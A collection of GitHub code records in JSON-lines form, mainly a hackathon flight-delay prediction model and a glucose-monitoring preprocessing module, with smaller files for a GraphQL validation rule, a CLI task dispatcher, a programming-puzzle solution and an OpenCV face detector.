loadFilterList()\n produceLists(listData)\n if(command == 3):\n produceLists(defaultListData)\n if(command == 4):\n editLists()\n if(command == 5):\n try:\n CustomSearch()\n except Exception as ex:\n print(ex)\n clear()\n continue\n else:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n except:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n\n\ndef main():\n init()\n Menu()\n\n\nmain()\n","repo_name":"justjcurtis/BoneMeal","sub_path":"BoneMeal.py","file_name":"BoneMeal.py","file_ext":"py","file_size_in_byte":23021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8397333631","text":"from ...error import GraphQLError\nfrom .base import ValidationRule\n\n\nclass NoUnusedVariables(ValidationRule):\n __slots__ = 'variable_definitions'\n\n def __init__(self, context):\n self.variable_definitions = []\n super(NoUnusedVariables, self).__init__(context)\n\n def enter_OperationDefinition(self, node, key, parent, path, ancestors):\n self.variable_definitions = []\n\n def leave_OperationDefinition(self, operation, key, parent, path, ancestors):\n variable_name_used = set()\n usages = self.context.get_recursive_variable_usages(operation)\n op_name = operation.name and operation.name.value or None\n\n for variable_usage in usages:\n variable_name_used.add(variable_usage.node.name.value)\n\n for variable_definition in self.variable_definitions:\n if variable_definition.variable.name.value not in variable_name_used:\n self.context.report_error(GraphQLError(\n self.unused_variable_message(variable_definition.variable.name.value, op_name),\n [variable_definition]\n ))\n\n def enter_VariableDefinition(self, node, key, parent, path, ancestors):\n self.variable_definitions.append(node)\n\n @staticmethod\n def unused_variable_message(variable_name, op_name):\n if op_name:\n return 'Variable \"${}\" is never used in operation \"{}\".'.format(variable_name, op_name)\n return 'Variable \"${}\" is never used.'.format(variable_name)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/graphql-core-1.1/wandb_graphql/validation/rules/no_unused_variables.py","file_name":"no_unused_variables.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"15223380790","text":"import sys\nread = 
sys.stdin.readline\n\nN = int(read())\nwords = dict()\nfor _ in range(N):\n words[read().rstrip()] = 1\nfor word in words:\n if word[::-1] in words:\n print(len(word), word[len(word)//2])\n break","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj9933.py","file_name":"boj9933.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16010014703","text":"from os import getcwd\n\nfrom . import wire_client\nfrom . import lib_drive_cmd\nfrom . import lib_drive_cmd_index\nfrom . import lib_utils\nfrom . import lib_wire\n\nfrom .models import Task\n\n\ndef main(args):\n if len(args.cmd) == 0:\n exit(lib_utils.run(['drive']).returncode)\n\n d_cmd = args.cmd[0]\n\n if d_cmd == 'index': # Should it be a special case?\n return lib_drive_cmd_index.main(args.cmd[1:])\n\n task = Task(tid=Task.gen_tid(), cwd=getcwd(), cmd='d', args=args.cmd, block=False)\n\n task_list = lib_drive_cmd.get_hook_pre(task.args[0])(task)\n\n if not task_list:\n task_list = [task]\n\n for task in task_list:\n if task.block == Task.LOCAL:\n ret = lib_drive_cmd.run(task)\n\n if task.block == Task.QUEUE:\n ret = wire_client.submit_task(task)\n\n if task.block == Task.BLOCK:\n ret = wire_client.submit_task(task)\n if ret == 0:\n ret = lib_drive_cmd.run(task)\n\n if ret != 0:\n return ret\n","repo_name":"pi314/tq","sub_path":"cli_d.py","file_name":"cli_d.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18036631111","text":"\"\"\"\n===================================================\n Introduction to Machine Learning (67577)\n IML HACKATHON, June 2020\n\nAuthor(s):\nYahav Bar\nShaked Haiman\nTzvi Cohen\n===================================================\n\"\"\"\n\nimport os\nimport re\nfrom typing import Optional, Any\n\nimport joblib\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom pandas import DataFrame\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\nfrom plotnine import ggplot, aes, geom_point, labs, geom_tile\nfrom sklearn import metrics, linear_model\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier\n\n\ndef get_initial_path() -> str:\n \"\"\"\n Gets the inital path.\n :return: The initial path\n \"\"\"\n # submissions should be relative to ./src (https://moodle2.cs.huji.ac.il/nu19/mod/forum/discuss.php?d=92765)\n return './'\n # return os.path.abspath('')\n\n\n\"\"\"The path to the flights training data set.\"\"\"\nFLIGHTS_TRAIN_DATA_PATH = os.path.join(get_initial_path(), 'flight_data', 'train_data.csv')\n\n\"\"\"The path to the weather training data set.\"\"\"\nWEATHER_TRAIN_DATA_PATH = os.path.join(get_initial_path(), 'all_weather_data', 'all_weather_data.csv')\n\n\"\"\"The path to the flights test data set.\"\"\"\nFLIGHTS_TEST_DATA_PATH = os.path.join(get_initial_path(), 'flights_demo_test_file.csv')\n\n\"\"\"The path to the regression model.\"\"\"\nREGRESSION_MODEL_OUTPUT_PATH = os.path.join(get_initial_path(), 'regression.pkl')\n\n\"\"\"The path to the classifier model.\"\"\"\nCLASSIFIER_MODEL_OUTPUT_PATH = os.path.join(get_initial_path(), 'classifier.pkl')\n\n\"\"\"The list of features the model has to have.\"\"\"\nFEATURES_MODEL_OUTPUT_PATH = os.path.join(get_initial_path(), 'features.pkl')\n\n\"\"\"The list of 
labels the delay is classified by.\"\"\"\nCLASSIFICATION_LABELS_OUTPUT_PATH = os.path.join(get_initial_path(), 'labels.pkl')\n\n\"\"\"The weather outliers.\"\"\"\nWEATHER_OUTLINERS = ['snow_in', 'precip_in', 'avg_wind_speed_kts']\n\n\"\"\"A dummy => prefix map.\"\"\"\nFLIGHT_DUMMIES_MAP = {\n    'DayOfWeek': 'weekday',\n    'Reporting_Airline': 'airline',\n    'Origin': 'origin',\n    'Dest': 'dest'\n}\n\n\"\"\"A list of dropped flight features.\"\"\"\nDROPPED_FLIGHTS_FEATURES = ['Tail_Number', 'OriginCityName', 'OriginState', 'DestCityName',\n                            'DestState', 'Flight_Number_Reporting_Airline', 'CRSElapsedTime', 'FlightDate']\n\n\n# region Model Trainer\n\nclass FlightModelPreProcessor:\n    \"\"\"Static helpers that clean and enrich the flight data.\"\"\"\n\n    \"\"\"A holidays calendar, used to create an 'is holiday' feature.\"\"\"\n    _calendar = USFederalHolidayCalendar()\n\n    \"\"\"Factorized labels\"\"\"\n    _factorized_data: Optional[DataFrame] = None\n\n    @staticmethod\n    def get_factorized_data():\n        \"\"\"\n        Gets the factorized data.\n        :return: The factorized data.\n        \"\"\"\n        return FlightModelPreProcessor._factorized_data\n\n    @staticmethod\n    def apply_cleanup_pipeline(df: DataFrame, weather_file_path: Optional[str] = '',\n                               drop_features: bool = False) -> DataFrame:\n        \"\"\"\n        Apply the cleanup pipeline on the given data frame.\n        :param df: The data frame.\n        :param weather_file_path: The weather file.\n        :param drop_features: True if we should optimize this model to drop unnecessary features, false otherwise.\n        :return: The data frame, after being processed in the standard pipeline.\n        \"\"\"\n        preprocess_pipeline = [\n            FlightModelPreProcessor.fix_flight_date,\n            lambda d: FlightModelPreProcessor.join_weather_db(d, weather_file_path)\n            if weather_file_path else d,\n            FlightModelPreProcessor.format_flight_time,\n            FlightModelPreProcessor.add_holiday_information,\n            FlightModelPreProcessor.add_dummies,\n            FlightModelPreProcessor.add_flight_times_bins,\n            FlightModelPreProcessor.add_is_same_state,\n            lambda d: FlightModelPreProcessor.drop_features(d) if not drop_features else d,\n        ]\n\n        for pipeline_entry in preprocess_pipeline:\n            df = pipeline_entry(df)\n\n        df.fillna(0, inplace=True)\n        return df\n\n    @staticmethod\n    def add_flight_times_bins(df: DataFrame) -> DataFrame:\n        \"\"\"\n        Group the scheduled flight times (HHMM values) into hourly bins.\n        :param df: The data frame.\n        :return: The modified data frame.\n        \"\"\"\n        hour_bins = np.linspace(0, 2400, num=25)\n        hour_labels = np.rint(np.linspace(0, 23, 24))\n\n        df[\"DepartureBins\"] = pd.cut(df['CRSDepTime'], bins=hour_bins, labels=hour_labels)\n        df[\"ArrivalBins\"] = pd.cut(df['CRSArrTime'], bins=hour_bins, labels=hour_labels)\n\n        df = df.drop(['CRSDepTime', 'CRSArrTime'], axis=1)\n        return df\n\n    @staticmethod\n    def drop_neglectable_entries(df: DataFrame) -> DataFrame:\n        \"\"\"\n        Drops neglect-able data that might add some unnecessary noise to our data frame.\n        :param df: The data frame.\n        :return: The modified data frame.\n        \"\"\"\n        df = df[abs(df[\"ArrDelay\"] - np.mean(df[\"ArrDelay\"])) < 3.5 * np.std(df[\"ArrDelay\"])]\n        df = df[~df[\"ArrDelay\"].isna()]\n        return df\n\n    @staticmethod\n    def factorize(df: DataFrame, field: str) -> DataFrame:\n        \"\"\"\n        Factorize the given field.\n        :param df: The data frame.\n        :param field: The field to factorize.\n        :return: The modified data frame.\n        \"\"\"\n        FlightModelPreProcessor._factorized_data = df[field].factorize()\n        df[field] = FlightModelPreProcessor._factorized_data[0]\n        return df\n\n    @staticmethod\n    def add_dummies(df: DataFrame) -> DataFrame:\n        \"\"\"\n        Adds dummies to categorize the 
data.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n return pd.get_dummies(df, columns=FLIGHT_DUMMIES_MAP.keys(), prefix=FLIGHT_DUMMIES_MAP.values())\n\n @staticmethod\n def drop_features(df: DataFrame) -> DataFrame:\n \"\"\"\n Drop unnecessary features from the flights df.\n Adds dummies to categorize the data.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n return df.drop(DROPPED_FLIGHTS_FEATURES, axis=1)\n\n @staticmethod\n def format_flight_time(df: DataFrame) -> DataFrame:\n \"\"\"\n Formats the flight date as a Pandas datetime.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n df['FlightDate'] = pd.to_datetime(df['FlightDate'], format=\"%d-%m-%y\")\n return df\n\n @staticmethod\n def add_holiday_information(df: DataFrame) -> DataFrame:\n \"\"\"\n Adds a \"is holiday\" feature.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n holidays = FlightModelPreProcessor._calendar.holidays(start=df['FlightDate'].min(), end=df['FlightDate'].max())\n df[\"IsHoliday\"] = df[\"FlightDate\"].isin(holidays)\n return df\n\n @staticmethod\n def add_is_same_state(df: DataFrame) -> DataFrame:\n \"\"\"\n Adds a \"is same state\" feature.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n df[\"IsSameState\"] = df[\"OriginState\"] == df[\"DestState\"]\n return df\n\n @staticmethod\n def join_weather_db(df: DataFrame, path_to_weather: str) -> DataFrame:\n \"\"\"\n Joins the weather data frame with the flights db.\n :param df: The flights df.\n :param path_to_weather: The path to the weather df.\n :return: The joined df.\n \"\"\"\n # Load\n weather_data_frame = FlightModelPreProcessor.load_weather_db(path_to_weather)\n\n # Join it with our data based on the given join columns (SQL like, lol)\n weather_origin_data = weather_data_frame.dropna().drop(columns=['station', 'FlightDate'])\n weather_dest_data = weather_origin_data.copy()\n weather_origin_data = weather_origin_data.add_suffix('_Origin')\n weather_dest_data = weather_dest_data.add_suffix('_Dest')\n weather_origin_data = pd.concat([weather_data_frame[['station', 'FlightDate']], weather_origin_data],\n axis=1).rename(columns={'station': 'Origin'})\n weather_dest_data = pd.concat([weather_data_frame[['station', 'FlightDate']], weather_dest_data],\n axis=1).rename(columns={'station': 'Dest'})\n\n return df \\\n .merge(weather_origin_data, on=['Origin', 'FlightDate'], how='left') \\\n .merge(weather_dest_data, on=['Dest', 'FlightDate'], how='left')\n\n @staticmethod\n def load_weather_db(path_to_weather: str):\n \"\"\"\n Loads the weather df.\n :param path_to_weather: The path to the weather df.\n :return: The loaded weather df.\n \"\"\"\n weather_df = pd.read_csv(path_to_weather,\n usecols=['station', 'day', 'max_temp_f', 'precip_in', 'avg_wind_speed_kts'],\n low_memory=False)\n\n # Fix the file contents\n weather_df = weather_df.rename(columns={'day': 'FlightDate'})\n weather_df.replace(to_replace=[\"None\", \"-100\", \"-99\"], value=np.nan, inplace=True)\n weather_df.iloc[:, 2:] = weather_df.iloc[:, 2:].apply(pd.to_numeric)\n weather_df[weather_df['max_temp_f'].astype(float) > 130] = np.nan\n\n return weather_df\n\n @staticmethod\n def remove_weather_outliers(df: DataFrame) -> DataFrame:\n \"\"\"\n Iterates and remove the weather outliners.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n for col in WEATHER_OUTLINERS:\n # Corrupted rows\n mean = df[((df[col] != 'None') & (df[col] != '-99') & 
~df[col].isna())][col].astype('float').mean()\n\n            # Fix none values\n            df[col] = df[col].astype('string')\n            df[col].loc[df[col] == 'None'] = str(mean)\n            df[col].loc[df[col].isna()] = str(mean)\n\n            # Float conversion and removal of neglectable values\n            df[col] = df[col].astype('float')\n            df[col].loc[df[col].astype('float') < 0] = mean\n            # Winsorise readings more than 3.5 standard deviations away from the mean\n            df[col].loc[abs(df[col].astype('float') - mean) > 3.5 * np.std(df[col].astype('float'))] = mean\n            # Zero the value for March-September dates\n            df[col][df['FlightDate'].str.contains('-0[3-9]-', na=False)] = 0\n\n        return df\n\n    @staticmethod\n    def fix_flight_date(df: DataFrame) -> DataFrame:\n        \"\"\"\n        Fixes the flight date entry.\n        :param df: The data frame.\n        :return: The modified data frame.\n        \"\"\"\n\n        # e.g. '2004-03-23' -> '23-03-04', matching the \"%d-%m-%y\" parse in format_flight_time\n        df['FlightDate'] = df['FlightDate'].apply(lambda d: re.sub(r'(\\d\\d)(\\d\\d)(-\\d+-)(\\d+)', r'\\4\\3\\2', d))\n        return df\n\n\nclass FlightModelTrainer:\n    \"\"\"\n    A class that trains a set of models that can detect flight delays.\n    \"\"\"\n\n    \"\"\"The used seed.\"\"\"\n    _random_seed: int\n\n    def __init__(self, random_seed: int = 0):\n        \"\"\"\n        Initialize the model trainer.\n        :param random_seed: The trainer random seed.\n        \"\"\"\n        # Setup the random seed\n        self._random_seed = random_seed\n        np.random.seed(random_seed)\n\n    def train(self, compression_level=9):\n        \"\"\"\n        Train the model.\n        :param compression_level: The saved model compression level.\n        \"\"\"\n        # Load the data\n        flights_df = pd.read_csv(FLIGHTS_TRAIN_DATA_PATH, low_memory=False)\n\n        # Merge\n        X = flights_df.drop([\"ArrDelay\", \"DelayFactor\"], axis=1)\n        y = flights_df[[\"ArrDelay\", \"DelayFactor\"]]\n\n        # Process the data\n        print('prepare')\n        processed_data = self._prepare_train_data(X, y)\n\n        # Setup the training process\n        y_train_regression = processed_data.loc[:, 'ArrDelay'].to_frame()\n        y_train_classification = processed_data.loc[:, 'DelayFactor'].to_frame()\n        x_train = processed_data.drop(['ArrDelay', 'DelayFactor'], axis=1)\n        collected_features = x_train.columns.values.tolist()\n\n        # Apply regression\n        print('regression')\n        lasso_regression = LassoCV(cv=5, random_state=self._random_seed).fit(x_train, y_train_regression.values.ravel())\n\n        # Apply classification\n        print('classification')\n        classification_model = OneVsRestClassifier(DecisionTreeClassifier(max_depth=11))\n        classification_model.fit(x_train, y_train_classification)\n\n        # Save the results\n        joblib.dump(lasso_regression, REGRESSION_MODEL_OUTPUT_PATH, compress=compression_level)\n        joblib.dump(classification_model, CLASSIFIER_MODEL_OUTPUT_PATH, compress=compression_level)\n        joblib.dump(collected_features, FEATURES_MODEL_OUTPUT_PATH, compress=compression_level)\n        joblib.dump(FlightModelPreProcessor.get_factorized_data(), CLASSIFICATION_LABELS_OUTPUT_PATH,\n                    compress=compression_level)\n\n        print('Done.')\n
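\n    # Smoke-test sketch (not part of the original flow): the dumped artifacts can be\n    # reloaded after a run to verify them, e.g.\n    #   model = joblib.load(REGRESSION_MODEL_OUTPUT_PATH)\n    #   features = joblib.load(FEATURES_MODEL_OUTPUT_PATH)\n    #   assert hasattr(model, 'predict') and len(features) > 0\n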
\n    def _do_train(self, x_train, x_validate, y_train, y_validate):\n        \"\"\"\n        Trains the model using polynomial features.\n        Unfortunately we couldn't finish this approach due to time constraints.\n        We leave the code here to show our best efforts! :) :muscle: :muscle:\n\n        :param x_train: The training data.\n        :param x_validate: The validation data.\n        :param y_train: The y train vector.\n        :param y_validate: The y validation vector.\n        \"\"\"\n        score_min = 10000\n        for order in range(1, 3):\n            for alpha in range(0, 20, 2):\n                feature = PolynomialFeatures(degree=order)\n                # Transform into locals so the raw features are reused on every iteration\n                train_X = feature.fit_transform(x_train)\n                validate_X = feature.transform(x_validate)\n\n                # ridge:\n                ridge_model = linear_model.Ridge(alpha=alpha / 10, normalize=True)\n                ridge_model.fit(train_X, y_train)\n                result1 = ridge_model.predict(validate_X)\n\n                # regression tree:\n                reg = DecisionTreeRegressor(max_depth=alpha + 1)\n                reg.fit(train_X, y_train)\n                result2 = reg.predict(validate_X)\n\n                score1 = metrics.mean_squared_error(result1, y_validate)\n                score2 = metrics.mean_squared_error(result2, y_validate)\n\n                if score1 < score_min:\n                    score_min = score1\n\n                print(\"n={} (a={}), MSE = {:<0.5}\".format(order, alpha / 10, score1))\n                print(\"tree: n={} (a={}), MSE = {:<0.5}\".format(order, alpha + 1, score2))\n\n    def _prepare_train_data(self, x: DataFrame, y: DataFrame,\n                            drop_features: bool = False) -> DataFrame:\n        \"\"\"\n        Prepare the data for training.\n        :param x: The main data.\n        :param y: The y vector.\n        :param drop_features: True if we should optimize this model to drop unnecessary features, false otherwise.\n        :return: The processed data.\n        \"\"\"\n        df = x.join(y)\n        df = FlightModelPreProcessor.drop_neglectable_entries(df)\n        df = FlightModelPreProcessor.factorize(df, 'DelayFactor')\n        return FlightModelPreProcessor.apply_cleanup_pipeline(df, WEATHER_TRAIN_DATA_PATH, drop_features)\n\n    def visualize(self):\n        \"\"\"\n        Visualize the data models.\n        \"\"\"\n        # Load the data\n        flights_df = pd.read_csv(FLIGHTS_TRAIN_DATA_PATH, low_memory=False)\n        flights_df = flights_df.head(10000)\n\n        # Merge\n        X = flights_df.drop([\"ArrDelay\", \"DelayFactor\"], axis=1)\n        y = flights_df[[\"ArrDelay\", \"DelayFactor\"]]\n\n        # Process the data\n        print('prepare')\n        df = self._prepare_train_data(X, y, True)\n\n        # Declare an \"is delayed\" feature to use in the plots\n        df[\"is_delayed\"] = (df['DelayFactor'] != -1).astype(int)\n\n        # Render a pair-plot with a lot of comparative information\n        print(sns.pairplot(df, vars=[\"CRSElapsedTime\", \"Distance\", \"Flight_Number_Reporting_Airline\"], hue='is_delayed'))\n\n        # Render specific features\n        print((ggplot(df) +\n               aes(x='Distance', y='ArrDelay', color='is_delayed') +\n               geom_point() +\n               labs(title=f\"Distance V. Delay: ${round(df['ArrDelay'].corr(df['Distance']), 5)}$\")))\n\n        print(ggplot(df) +\n              aes(x='CRSElapsedTime', y='ArrDelay', color='is_delayed') +\n              geom_point() +\n              labs(title=f\"CRSElapsedTime V. Delay: ${round(df['ArrDelay'].corr(df['CRSElapsedTime']), 3)}$\"))\n\n        print(ggplot(df) +\n              aes(x='DepartureBins', y='ArrDelay', color='is_delayed') +\n              geom_point() +\n              labs(title=f\"DepartureBins V. Delay: ${round(df['ArrDelay'].corr(df['DepartureBins']), 3)}$\"))\n\n        print((ggplot(df) +\n               aes(x='ArrivalBins', y='ArrDelay', color='is_delayed') +\n               geom_point() +\n               labs(title=f\"ArrivalBin V. 
Delay: {round(df['ArrDelay'].corr(df['ArrivalBins']), 3)}\")))\n\n # Create a tiles based indicators\n numeric_columns = pd.concat([df['ArrivalBins'], df['DepartureBins'], df['CRSElapsedTime'],\n df['Distance'], df['ArrDelay']], axis=1)\n correlation_matrix = numeric_columns.corr(method='pearson').round(2)\n correlation_matrix.index.name = 'variable2'\n correlation_matrix.reset_index(inplace=True)\n print(ggplot(pd.melt(correlation_matrix, id_vars=['variable2'])) +\n aes(x='variable', y='variable2', fill='value') +\n geom_tile() +\n labs(title='Numeric Columns Correlation'))\n\n\n# endregion\n\n\n# region Predictor\n\nclass FlightPredictor:\n \"\"\"\n A class that uses a pre-made models to predicate flights delays.\n \"\"\"\n\n \"\"\"The path to the weather file.\"\"\"\n weather_file_path: Optional[str]\n\n \"\"\"A cached object that contains the used features, so that we can re-index the test data.\"\"\"\n _features: Any\n\n \"\"\"The classifier object.\"\"\"\n _classifier: OneVsRestClassifier\n\n \"\"\"The labels object.\"\"\"\n _labels: Any\n\n def __init__(self, path_to_weather: str = ''):\n \"\"\"\n Initialize an object from this class.\n @param path_to_weather: The path to a csv file containing weather data.\n \"\"\"\n # Thaw the freeze'd models\n self._model = joblib.load(REGRESSION_MODEL_OUTPUT_PATH)\n self._classifier = joblib.load(CLASSIFIER_MODEL_OUTPUT_PATH)\n self._features = joblib.load(FEATURES_MODEL_OUTPUT_PATH)\n self._labels = joblib.load(CLASSIFICATION_LABELS_OUTPUT_PATH)\n\n self.weather_file_path = path_to_weather if path_to_weather != '' else None\n\n def predict(self, x):\n \"\"\"\n Receives a pandas DataFrame of shape (m, 15) with m flight features, and predicts their\n delay at arrival and the main factor for the delay.\n @param x: A pandas DataFrame with shape (m, 15)\n @return: A pandas DataFrame with shape (m, 2) with your prediction\n \"\"\"\n\n # Prepare the data for evaluation\n df = self._prepare_test_data(x)\n\n # Regression\n regression = self._model.predict(df)\n\n # Classification\n classification = self._classifier.predict(df)\n FlightModelPreProcessor.get_factorized_data()\n\n pred_df = pd.DataFrame({\n 'PredArrDelay': regression,\n 'PredDelayFactor': classification\n })\n\n pred_df['PredDelayFactor'] = pred_df['PredDelayFactor'].apply(self.classify_by_label)\n pred_df.loc[pred_df['PredArrDelay'] <= 0, \"PredDelayFactor\"] = 'Nan'\n\n return pred_df\n\n def classify_by_label(self, row: int) -> str:\n \"\"\"\n Gets the label associated with this row.\n :param row: The row.\n :return: The label.\n \"\"\"\n try:\n if row != -1:\n return self._labels[1][row]\n\n return 'Nan'\n except KeyError:\n return 'Nan'\n\n def _prepare_test_data(self, X) -> DataFrame:\n \"\"\"\n Prepare the test data for evaluation.\n :param X: The data frame values.\n :return:\n \"\"\"\n joined_df = FlightModelPreProcessor.apply_cleanup_pipeline(X, self.weather_file_path)\n joined_df = joined_df.reindex(self._features, axis=1, fill_value=0)\n joined_df.fillna(0, inplace=True)\n return joined_df\n\n# endregion\n","repo_name":"TzviCohen/Flight-Delay-Detector","sub_path":"task1/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11532402103","text":"import pandas as pd\nimport datetime\nimport numpy as np\nimport warnings\nimport copy\n\ndef check_df(df):\n \"\"\"\n Check if the given object is a valid DataFrame.\n \n Args:\n df (object): The object 
to be checked.\n\n    Returns:\n        bool: True if the object is a valid DataFrame, False otherwise.\n\n    Note:\n        - If the object is not a DataFrame, a warning will be issued.\n        - If the DataFrame has null values in the 'time' or 'glc' columns, it will be considered invalid.\n        - An empty DataFrame will also be considered invalid.\n    \"\"\"\n    if not isinstance(df, pd.DataFrame):\n        # I want to return this info to user somehow??\n        warnings.warn('Not a dataframe')\n        return False\n    else:\n        # drop any null values in the glc column\n        df = df.dropna(subset=['time', 'glc'])\n        if df.empty:\n            warnings.warn('Empty dataframe')\n            return False\n        else:\n            return True\n\ndef replace_cutoffs(df, remove=False, cap=True, lo_cutoff=2.1, hi_cutoff=22.3):\n    \"\"\"\n    Replace values in the 'glc' column of the given DataFrame based on specified cutoffs.\n\n    Args:\n        df (pandas.DataFrame): The DataFrame in which values will be replaced.\n        remove (bool, optional): Indicates whether to remove rows with non-numeric 'glc' values. Defaults to False.\n        cap (bool, optional): Indicates whether to cap values above the high cutoff and below the low cutoff. Defaults to True.\n        lo_cutoff (float, optional): The low cutoff value for replacing 'glc' values. Defaults to 2.1.\n        hi_cutoff (float, optional): The high cutoff value for replacing 'glc' values. Defaults to 22.3.\n\n    Returns:\n        pandas.DataFrame: The modified DataFrame with replaced 'glc' values and optionally removed rows.\n\n    Note:\n        - If remove is False, the function replaces non-numeric markers ('High'/'HI'/'Low'/'LO', etc.) in the 'glc' column with the respective cutoff values.\n        - If cap is True, the function caps values above hi_cutoff and below lo_cutoff with the respective cutoff values.\n        - The function also converts the 'glc' column to numeric values and converts the 'time' column to datetime.\n    \"\"\"\n    df = copy.copy(df)\n    if not remove:\n        df['glc'] = pd.to_numeric(df['glc'].replace({'High': hi_cutoff, 'Low': lo_cutoff, 'high': hi_cutoff, 'low': lo_cutoff, \n                'HI':hi_cutoff, 'LO':lo_cutoff, 'hi':hi_cutoff, 'lo':lo_cutoff}))\n\n    if cap:\n        df.loc[df['glc']>hi_cutoff, 'glc'] = hi_cutoff\n        df.loc[df['glc']<lo_cutoff, 'glc'] = lo_cutoff\n\n    df['glc'] = pd.to_numeric(df['glc'])\n    df['time'] = pd.to_datetime(df['time'])\n    return df\n\n\ndef interpolate_gaps(df_resampled, m, method='pchip', order=None, limit=None):\n    # (Reconstructed header - the original did not survive extraction.) Interpolate gaps in a\n    # resampled glucose trace; m holds each gap's run length, and runs longer than limit stay masked.\n    # Methods such as 'spline' or 'polynomial' need an order passed through\n    if order is not None:\n        df_interp = df_resampled.interpolate(method=method,\n                                             order=order,\n                                             limit_area='inside',\n                                             limit_direction='forward',\n                                             limit=limit).mask(m>limit)\n    # Else no order is needed\n    else:\n        df_interp = df_resampled.interpolate(method=method,\n                                             limit_area='inside',\n                                             limit_direction='forward',\n                                             limit=limit).mask(m>limit)\n    df_interp = df_interp.round(1).reset_index()\n    return df_interp\n
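\n# Hedged usage sketch (illustrative values, assuming the 'time'/'glc' layout above):\n#   raw = pd.DataFrame({'time': ['2023-01-01 00:00', '2023-01-01 00:05'], 'glc': ['HI', 3.9]})\n#   replace_cutoffs(raw)['glc'].tolist()  # -> [22.3, 3.9]; 'HI' is mapped to hi_cutoff\n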
\ndef set_time_frame(df, window):\n    \"\"\"\n    Filter the given DataFrame based on the specified time window.\n\n    Args:\n        df (pandas.DataFrame): The DataFrame to be filtered.\n        window (list or dict): The time window to filter the DataFrame by. It can be specified as a list or a dictionary.\n\n        - If window is a list, it should contain two elements representing the start and end times of the window.\n          Only the rows with 'time' values greater than or equal to the start time and less than the end time will be returned.\n\n        - If window is a dictionary, it should contain key-value pairs where the keys represent IDs and the values\n          are two-element lists representing the start and end times for each ID. The function will return all rows\n          where the 'ID' column matches the specified IDs and the 'time' values fall within the respective time windows.\n\n    Returns:\n        pandas.DataFrame: The filtered DataFrame containing only the rows that match the specified time window.\n\n    Raises:\n        ValueError: If the window argument is not of type list or dict.\n    \"\"\"\n    if isinstance(window, list):\n        return df.loc[(df['time']>=window[0])&(df['time']<window[1])]\n    elif isinstance(window, dict):\n        conditions = '|'.join([\"((df['ID']=='{0}')&(df['time']>='{1}')&(df['time']<='{2}'))\".format(ID, window[0], window[1]) for ID, window in window.items()])\n        cut_df = df[eval(conditions)].reset_index(drop=True)\n        return cut_df\n    else:\n        raise ValueError(\"Invalid type for the 'window' argument. Expected a list or a dictionary.\")\n\ndef detect_units(df):\n    # Readings above 35 only occur in mg/dL traces\n    if df['glc'].min() > 35:\n        return 'mg/dL'\n    else:\n        return 'mmol/L'\n\n\ndef change_units(df):\n    \"\"\"\n    Convert glucose readings between mg/dL and mmol/L, based on the detected units.\n\n    Args:\n        df (pandas.DataFrame): The DataFrame containing a 'glc' column with glucose readings.\n\n    Returns:\n        pandas.DataFrame: The DataFrame with glucose units converted.\n\n    Note:\n        - The units are inferred with detect_units (mg/dL when the minimum reading is above 35).\n        - mg/dL readings are converted to mmol/L by multiplying by 0.0557 and rounding to one decimal place.\n        - mmol/L readings are converted to mg/dL by dividing by 0.0557 and rounding to the nearest integer.\n    \"\"\"\n    df = copy.copy(df)\n    if detect_units(df)=='mg/dL':\n        # Convert mg/dL to mmol/L by multiplying by 0.0557 and rounding to one decimal place\n        df['glc'] = (df['glc'] * 0.0557).round(1)\n    else:\n        # Convert mmol/L to mg/dL by dividing by 0.0557 and rounding to the nearest integer\n        df['glc'] = (df['glc'] / 0.0557).round(0).astype(int)\n\n    return df\n","repo_name":"cafoala/diametrics","sub_path":"src/diametrics/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"17764300828","text":"import numpy as np\r\nimport os\r\nimport cv2\r\n\r\nclass FaceDetector(object):\r\n    def __init__(self, deploy_path, caffe_path):\r\n        self.net = cv2.dnn.readNetFromCaffe(deploy_path, caffe_path)\r\n\r\n    def __detect__(self, image):\r\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n        (h, w) = image.shape[:2]\r\n        blob = cv2.dnn.blobFromImage(cv2.resize(\r\n            image, (300, 300)), 1.0, (300, 300), (104.0, 177.0, 123.0)\r\n        )\r\n        self.net.setInput(blob)\r\n        detections = self.net.forward()\r\n        faces_coord = []\r\n        for i in range(0, detections.shape[2]):\r\n            confidence = detections[0, 0, i, 2]\r\n            if confidence > 0.99:\r\n                faces_coord.append((detections[0, 0, i, 3:7] * np.array([w, h, w, h])).astype(\"int\"))\r\n        faces_coord = np.array(faces_coord)\r\n        return faces_coord\r\n
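\r\n    # __detect__ notes: blobFromImage subtracts the (104.0, 177.0, 123.0) per-channel means\r\n    # (the values commonly used with this Caffe SSD face model - an assumption, not stated here),\r\n    # and only boxes scoring above 0.99 confidence are kept.\r\n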
